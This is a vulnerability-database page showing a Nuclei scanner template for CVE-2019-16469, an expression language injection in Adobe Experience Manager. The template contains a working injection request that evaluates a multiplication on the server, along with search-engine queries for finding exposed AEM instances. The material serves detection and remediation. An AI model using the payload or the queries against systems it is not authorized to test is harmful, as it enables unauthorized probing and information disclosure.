Lucene search
K

Adobe Experience Manager - Expression Language Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 116 Views

Adobe Experience Manager - Expression Language Injection vulnerability in versions 6.5, 6.4, 6.3, 6.2, 6.1, and 6.0. Successful exploitation could lead to sensitive information disclosure. To fix, update to Service Pack 6.5.3.

Related
Refs
Code
id: CVE-2019-16469

info:
  name: Adobe Experience Manager - Expression Language Injection
  author: DomenicoVeneziano
  severity: high
  description: |
    Adobe Experience Manager versions 6.5, 6.4, 6.3, 6.2, 6.1, and 6.0 has an expression language injection vulnerability.
  impact: |
    Successful exploitation could lead to sensitive information disclosure
  remediation: |
    To fix the vulnerability, it is necessary to update the Adobe AEM instance using the Service Pack 6.5.3.0
  reference:
    - https://nozero.io/en/cve-2019-16469-adobe-aem-expression-language-injection/
    - https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16469
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-16469
    cwe-id: CWE-917
    epss-score: 0.17186
    epss-percentile: 0.96708
    cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: experience_manager
    shodan-query:
      - http.component:"Adobe Experience Manager"
      - http.component:"adobe experience manager"
      - http.title:"aem sign in"
      - cpe:"cpe:2.3:a:adobe:experience_manager"
    fofa-query: title="aem sign in"
    google-query: intitle:"aem sign in"
  tags: cve,cve2019,aem,eli,csti,adobe,vuln
variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - method: GET
    path:
      - '{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'data-formid="{{result}}"'
          - 'Embed Code'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f83a1fea096b4bcda1bed5dc4c5f2a8a0045bb3f4edf07a99604651ddfd54c0b02210086af973f2aea328ed4868ffe6deae9802df7b2f52d7d6bb6e3eb3fbcb1707e9f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.17186
116